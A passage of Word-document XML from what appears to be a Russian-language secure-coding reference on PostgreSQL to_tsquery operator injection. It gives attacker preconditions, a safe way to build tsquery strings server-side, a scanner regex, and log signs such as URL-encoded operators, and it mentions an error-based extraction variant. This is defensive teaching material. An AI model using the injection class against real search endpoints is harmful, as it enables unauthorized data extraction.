      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EXECUTE-доступ к эндпоинту.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EC955A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Драйвер:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> любой — bind-параметр работает одинаково.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532A513F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition в коде:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery(:q)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery('lang', :q)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — user-input передаётся в parsing-функцию. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plainto_tsquery(:q)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>phraseto_tsquery(:q)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery(:q)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — защищённые варианты, не 3.15.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197BB688"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to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стандартная функция, используется когда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>сам разработчик</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> конструирует query-string с operators (например, для advanced search-UI с явными boolean-toggle-кнопками):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A162E50" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Шаблон 1: построение tsquery server-side из validated tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFB81A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def build_tsquery(terms: list[str], op: str = "AND") -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAA1EFC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # terms — уже validated tokens, op — Literal["AND", "OR"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F73ADA6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sep = " &amp; " if op == "AND" else " | "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D975C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return sep.join(quote_tsquery_term(t) for t in terms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2887F6D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031440CA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def quote_tsquery_term(t: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0633D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Удалить operator-chars из каждого term + escape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FF8A42" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return "'" + re.sub(r"[&amp;|!&lt;&gt;():*']", "", t) + "'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2167FDF0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D85B2AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/articles/search")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D24BCE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def search_articles(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056F3E17" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    terms: list[str] = Query([]),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ADA1F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    op: Literal["AND", "OR"] = Query("AND"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2A6D1E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A91E8C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6405A411" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if not terms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47741DC1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA65F70" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tsq = build_tsquery(terms, op)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A81BDD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text("SELECT ... WHERE search_vector @@ to_tsquery('english', :q)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D41AE66" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(query, {"q": tsq})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCC52FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return [...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08980515" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>terms</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — список отдельных tokens, не free-form. Operators (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r>
        <w:t>) — Literal, валидируется на уровне routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B07BC50" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для простого "Google-like" search-UI — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (см. 3.15.3) предпочтительнее, потому что user-syntax restricted в безопасный subset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D0200F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056A8E82" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Статический сканер</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery(...:var)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с bind-параметром, без сопровождающего pre-processing функции. В Python regex: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery\s*\([^)]*:\w+\)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + проверка, что параметр не build_tsquery output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E9C766" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: запросы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с literals содержащими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от endpoint-ов, где должен быть простой search.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A939167" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database-логи</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>syntax error in tsquery: "..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от user-search endpoint — индикатор Variant C или попытки разведки parser-а.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3DE28D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP access-log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: query parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%26</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (URL-encoded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%7C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (URL-encoded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%21</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (URL-encoded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:%2A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (URL-encoded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:*</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232915AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступна с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 8.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (2008). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (2018). Никакие фиксы не закрывают этот класс — operator-parsing является design-feature </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A30D772" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC63590" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.15.1 LIKE wildcards</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параллельная семантическая поверхность с тем же типом mismatch (значение vs семантика символов).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5501A69C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.15.3 websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — безопасная альтернатива, migration path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B618B95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.15.4 tsquery как error-based канал</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — расширение Variant C — full extraction через syntax error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2834B5F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
